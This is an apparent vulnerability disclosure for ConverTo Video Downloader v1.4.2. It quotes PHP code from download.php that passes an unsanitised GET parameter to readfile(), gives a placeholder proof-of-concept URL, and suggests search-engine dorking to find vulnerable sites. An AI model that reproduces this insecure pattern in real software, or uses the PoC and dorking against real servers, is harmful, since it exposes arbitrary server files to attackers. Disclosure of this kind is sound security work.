ConverTo Video Downloader and Converter version 1.4.2 suffers from a file download vulnerability.
====================================================================================================================================
| # Title : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] infected file :download.php
[+] line 12 readfile ($file); & line 5 $file = urldecode($_GET['f']);
<?php
if(isset($_GET['f'])){
$siz = convertToBytes($_GET['sz']);
$file = urldecode($_GET['f']);
$rand = rand(0,5000);
header("Content-Description: File Transfer");
header("Content-Type: application/octet-stream");
header('Content-Length: ' . $siz);
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");
ob_clean(); flush();
readfile ($file);
}
[+] http://localhost/[PATH]/download.php?f= Ev!l
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================